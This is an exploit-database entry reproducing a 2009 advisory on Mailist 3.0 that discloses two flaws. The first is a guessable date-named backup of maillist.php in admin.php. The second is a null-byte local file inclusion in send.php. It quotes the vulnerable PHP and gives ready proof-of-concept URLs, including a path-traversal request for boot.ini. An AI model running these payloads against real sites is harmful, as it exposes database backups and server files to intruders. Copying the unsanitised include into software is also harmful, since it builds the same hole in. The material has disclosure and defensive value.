Mailist 3.0 Insecure Backup/Local File Inclusion

vendor:

Mailist

by:

SirGod

8.8

CVSS

HIGH

Insecure Backup/Local File Inclusion

CWE

Product Name: Mailist

Affected Version From: 3

Affected Version To: 3

Patch Exists: NO

Related CWE: N/A

CPE: a:ninjadesigns:mailist

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Mailist 3.0 Insecure Backup/Local File Inclusion

The vulnerable code in admin.php creates a backup of the maillist.php file using the date() function. This allows an attacker to guess the database backup if they know when it was created. The vulnerable code in send.php allows for local file inclusion, which can be exploited by appending %00 to the end of the URL.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file operation.

Source

Exploit-DB raw data:

#############################################################################################
[+] Mailist 3.0 Insecure Backup/Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
[+] www.anti-intruders.org
#############################################################################################

[+] Homepage : http://ninjadesigns.co.uk/

[+] Download : http://ninjadesigns.co.uk/enter/mailist.zip


[+] Insecure Backup

 - Vulnerable code in admin.php


---------------------------------------------------------------------


if (isset($_GET['backup'])){
	echo "<br>";
	$file = 'maillist.php';
	$newfile = 'backups/'.date("jnY").'.txt';
	copy($file, $newfile);
	echo 'Successfully backed up. (backups/'.$newfile.')<br>';
	echo '<a href="'.$_SERVER['PHP_SELF'].'">Hide</a><br>';
}


----------------------------------------------------------------------

 We can see how its crated a backup : $newfile = 'backups/'.date("jnY").'.txt';
 The date() function is used.

    n -	Numeric representation of a month, without leading zeros
    j -	Day of the month without leading zeros
    Y -	A full numeric representation of a year, 4 digits

 So we can guess the database backup if we know when was created.

   Example : 622009.txt

        6 - the day without leading 0
        2 - the month without leading 0
        2009 - the year

   PoC :  http://127.0.0.1/path/backups/622009.txt



[+] Local File Inclusion


 - Vulnerable code in send.php :

---------------------------------------------------------------------

if(isset($load)){

include("outbox/".$load.".txt");
}


---------------------------------------------------------------------

 Example :

   http://127.0.0.1/path/send.php?load=[Local File]%00

 PoC :

    http://127.0.0.1/path/send.php?load=../../../../boot.ini%00



#############################################################################################

# milw0rm.com [2009-02-06]